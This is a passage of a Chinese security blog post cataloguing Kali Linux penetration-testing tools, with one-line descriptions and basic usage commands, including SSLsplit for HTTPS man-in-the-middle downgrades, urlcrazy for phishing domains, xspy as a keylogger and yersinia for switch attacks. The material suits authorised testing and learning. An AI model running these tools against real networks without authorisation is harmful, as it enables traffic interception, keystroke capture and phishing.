<h2 id="snmpcheck"><a href="#snmpcheck" class="headerlink" title="snmpcheck"></a>snmpcheck</h2><p>描述: SNMP枚举工具。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ snmpcheck -t 192.168.1.2 -c public</div></pre></td></tr></table></figure></p>
<h2 id="sslcaudit"><a href="#sslcaudit" class="headerlink" title="sslcaudit"></a>sslcaudit</h2><p>描述: 实用的自动化测试的SSL / TLS的客户端来抵抗中间人攻击。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ caudit <span class="_">-l</span> 0.0.0.0:443 -v 1</div></pre></td></tr></table></figure></p>
<h2 id="SSLsplit"><a href="#SSLsplit" class="headerlink" title="SSLsplit"></a>SSLsplit</h2><p>描述: 中间人攻击，将https协议强制替换为http。。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$  sslsplit -D <span class="_">-l</span> connections.log -j /tmp/sslsplit/ -S /tmp/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080</div></pre></td></tr></table></figure></p>
<h2 id="SSLyze"><a href="#SSLyze" class="headerlink" title="SSLyze"></a>SSLyze</h2><p>描述: 是一款使用Python实现的SSL扫描工具，它可以扫描出SSL中一些经典的配置错误。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ sslyze --regular www.example.com</div></pre></td></tr></table></figure></p>
<h2 id="theharvester"><a href="#theharvester" class="headerlink" title="theharvester"></a>theharvester</h2><p>描述: 邮箱挖掘器。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ theharvester <span class="_">-d</span> kali.org <span class="_">-l</span> 500 -b google</div></pre></td></tr></table></figure></p>
<h2 id="tlssled"><a href="#tlssled" class="headerlink" title="tlssled"></a>tlssled</h2><p>描述: TLSSLed是一个Linux bash脚本,它的功能是测试目标SSL/TLS(HTTPS)WEB 服务器的安全性。TLSSLed基于sslscan，功能包括：测试目标是否支持SSLv2协议、NULL cipher等等。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ tlssled 192.168.1.1 443</div></pre></td></tr></table></figure></p>
<h2 id="tshark"><a href="#tshark" class="headerlink" title="tshark"></a>tshark</h2><p>描述: 可以直接过滤数据包导出<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ tshark <span class="_">-f</span> <span class="string">"tcp port 80"</span> -i eth0</div></pre></td></tr></table></figure></p>
<h2 id="urlcrazy"><a href="#urlcrazy" class="headerlink" title="urlcrazy"></a>urlcrazy</h2><p>描述: 钓鱼域名。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ urlcrazy -k dvorak -r example.com</div></pre></td></tr></table></figure></p>
<h2 id="whatweb"><a href="#whatweb" class="headerlink" title="whatweb"></a>whatweb</h2><p>描述: WhatWeb是一款网站指纹识别工具，主要针对的问题是：“这个网站使用的什么技术？”WhatWeb可以告诉你网站搭建使用的程序，包括何种CMS系统、什么博客系统、Javascript库、web服务器、内嵌设备等。WhatWeb有超过900个插件，并且可以识别版本号、email地址、账号、web框架、SQL错误等等。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ whatweb www.example.com</div></pre></td></tr></table></figure></p>
<h2 id="Wireshark"><a href="#Wireshark" class="headerlink" title="Wireshark"></a>Wireshark</h2><p>描述: 流量分析。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ wireshark</div></pre></td></tr></table></figure></p>
<h2 id="xspy"><a href="#xspy" class="headerlink" title="xspy"></a>xspy</h2><p>描述: 键盘记录器<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ xspy</div></pre></td></tr></table></figure></p>
<h2 id="yersinia"><a href="#yersinia" class="headerlink" title="yersinia"></a>yersinia</h2><p>描述: 是国外的一款专门针对交换机执行第二层攻击的一个攻击工具。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ yersinia -G</div></pre></td></tr></table></figure></p>
<h2 id="zaproxy"><a href="#zaproxy" class="headerlink" title="zaproxy"></a>zaproxy</h2><p>描述: 一个易于使用交互式的用于web应用程序漏洞挖掘的渗透测试工具。<br>用法：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ zaproxy</div></pre></td></tr></table></figure></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/kali/" rel="tag"># kali</a>
          
            <a href="/tags/tool/" rel="tag"># tool</a>
          
            <a href="/tags/information-gathering/" rel="tag"># information gathering</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/09/22/github-markdown-jekyll/" rel="next" title="Github + Markdown + Jekyll 搭建博客">
                <i class="fa fa-chevron-left"></i> Github + Markdown + Jekyll 搭建博客
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/09/29/mysql-root-code-execution-CVE-2016-6662/" rel="prev" title="Mysql 提权漏洞 CVE-2016-6662">
                Mysql 提权漏洞 CVE-2016-6662 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>

          
          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/orleven.jpg"
               alt="Orleven" />
          <p class="site-author-name" itemprop="name">Orleven</p>
           
              <p class="site-description motion-element" itemprop="description">Life is full of ups and downs.</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">5</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index-1.html">
                <span class="site-state-item-count">23</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/orleven" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://www.weibo.com/u/3846125587" target="_blank" title="Weibo">
                  
                    <i class="fa fa-fw fa-weibo"></i>
                  
                  Weibo
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#概述"><span class="nav-number">1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#信息收集"><span class="nav-number">2.</span> <span class="nav-text">信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#acccheck："><span class="nav-number">2.1.</span> <span class="nav-text">acccheck：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ace："><span class="nav-number">2.2.</span> <span class="nav-text">ace：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#amap："><span class="nav-number">2.3.</span> <span class="nav-text">amap：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Automater"><span class="nav-number">2.4.</span> <span class="nav-text">Automater</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#braa"><span class="nav-number">2.5.</span> <span class="nav-text">braa</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#casefile"><span class="nav-number">2.6.</span> <span class="nav-text">casefile</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#cdpsnarf"><span class="nav-number">2.7.</span> <span class="nav-text">cdpsnarf</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#cisco-torch"><span class="nav-number">2.8.</span> <span class="nav-text">cisco-torch</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#copy-router-config"><span class="nav-number">2.9.</span> <span class="nav-text">copy-router-config</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#dmitry"><span class="nav-number">2.10.</span> <span class="nav-text">dmitry</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#dnmap"><span class="nav-number">2.11.</span> <span class="nav-text">dnmap</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#dnsenum"><span class="nav-number">2.12.</span> <span class="nav-text">dnsenum</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#dnsmap"><span class="nav-number">2.13.</span> <span class="nav-text">dnsmap</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#dnsrecon"><span class="nav-number">2.14.</span> <span class="nav-text">dnsrecon</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#dnstracer"><span class="nav-number">2.15.</span> <span class="nav-text">dnstracer</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#dnswalk"><span class="nav-number">2.16.</span> <span class="nav-text">dnswalk</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#dotdotpwn-pl"><span class="nav-number">2.17.</span> <span class="nav-text">dotdotpwn.pl</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#enum4linux"><span class="nav-number">2.18.</span> <span class="nav-text">enum4linux</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#enumiax"><span class="nav-number">2.19.</span> <span class="nav-text">enumiax</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Fierce"><span class="nav-number">2.20.</span> <span class="nav-text">Fierce</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#fragroute"><span class="nav-number">2.21.</span> <span class="nav-text">fragroute</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ghost-phisher"><span class="nav-number">2.22.</span> <span class="nav-text">ghost-phisher</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#GoLismero"><span class="nav-number">2.23.</span> <span class="nav-text">GoLismero</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#hping3"><span class="nav-number">2.24.</span> <span class="nav-text">hping3</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#intrace"><span class="nav-number">2.25.</span> <span class="nav-text">intrace</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#lbd"><span class="nav-number">2.26.</span> <span class="nav-text">lbd</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#maltego"><span class="nav-number">2.27.</span> <span class="nav-text">maltego</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#masscan"><span class="nav-number">2.28.</span> <span class="nav-text">masscan</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Miranda"><span class="nav-number">2.29.</span> <span class="nav-text">Miranda</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#nmap"><span class="nav-number">2.30.</span> <span class="nav-text">nmap</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#nping"><span class="nav-number">2.31.</span> <span class="nav-text">nping</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ndiff"><span class="nav-number">2.32.</span> <span class="nav-text">ndiff</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ncat"><span class="nav-number">2.33.</span> <span class="nav-text">ncat</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#p0f"><span class="nav-number">2.34.</span> <span class="nav-text">p0f</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Recon-ng"><span class="nav-number">2.35.</span> <span class="nav-text">Recon-ng</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#searchsploit"><span class="nav-number">2.36.</span> <span class="nav-text">searchsploit</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#setoolkit"><span class="nav-number">2.37.</span> <span class="nav-text">setoolkit</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#smtp-user-enum"><span class="nav-number">2.38.</span> <span class="nav-text">smtp-user-enum</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#snmpcheck"><span class="nav-number">2.39.</span> <span class="nav-text">snmpcheck</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sslcaudit"><span class="nav-number">2.40.</span> <span class="nav-text">sslcaudit</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SSLsplit"><span class="nav-number">2.41.</span> <span class="nav-text">SSLsplit</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SSLyze"><span class="nav-number">2.42.</span> <span class="nav-text">SSLyze</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#theharvester"><span class="nav-number">2.43.</span> <span class="nav-text">theharvester</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#tlssled"><span class="nav-number">2.44.</span> <span class="nav-text">tlssled</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#tshark"><span class="nav-number">2.45.</span> <span class="nav-text">tshark</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#urlcrazy"><span class="nav-number">2.46.</span> <span class="nav-text">urlcrazy</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#whatweb"><span class="nav-number">2.47.</span> <span class="nav-text">whatweb</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Wireshark"><span class="nav-number">2.48.</span> <span class="nav-text">Wireshark</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#xspy"><span class="nav-number">2.49.</span> <span class="nav-text">xspy</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#yersinia"><span class="nav-number">2.50.</span> <span class="nav-text">yersinia</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#zaproxy"><span class="nav-number">2.51.</span> <span class="nav-text">zaproxy</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Orleven</span>
</div>


<div class="powered-by">
    个人专属
</div>

<div class="theme-info">
  Orleven Blog 
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    
    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  



  




	





  





  





  



  
  
  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.popup').toggle();
    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';
      $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = $( "entry", xmlResponse ).map(function() {
            return {
              title: $( "title", this ).text(),
              content: $("content",this).text(),
              url: $( "url" , this).text()
            };
          }).get();
          var $input = document.getElementById(search_id);
          var $resultContent = document.getElementById(content_id);
          $input.addEventListener('input', function(){
            var matchcounts = 0;
            var str='<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length > 1) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var content_index = [];
                var data_title = data.title.trim().toLowerCase();
                var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                var data_url = decodeURIComponent(data.url);
                var index_title = -1;
                var index_content = -1;
                var first_occur = -1;
                // only match artiles with not empty titles and contents
                if(data_title != '') {
                  keywords.forEach(function(keyword, i) {
                    index_title = data_title.indexOf(keyword);
                    index_content = data_content.indexOf(keyword);
                    if( index_title >= 0 || index_content >= 0 ){
                      isMatch = true;
                      if (i == 0) {
                        first_occur = index_content;
                      }
                    }

                  });
                }
                // show search results
                if (isMatch) {
                  matchcounts += 1;
                  str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                  var content = data.content.trim().replace(/<[^>]+>/g,"");
                  if (first_occur >= 0) {
                    // cut out 100 characters
                    var start = first_occur - 20;
                    var end = first_occur + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if(start == 0){
                      end = 50;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    var match_content = content.substring(start, end);
                    // highlight all keywords
                    keywords.forEach(function(keyword){
                      var regS = new RegExp(keyword, "gi");
                      match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                    });

                    str += "<p class=\"search-result\">" + match_content +"...</p>"
                  }
                  str += "</li>";
                }
              })};
            str += "</ul>";
            if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
            if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
            $resultContent.innerHTML = str;
          });
          proceedsearch();
        }
      });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>


  

  

  

  


  

</body>
</html>
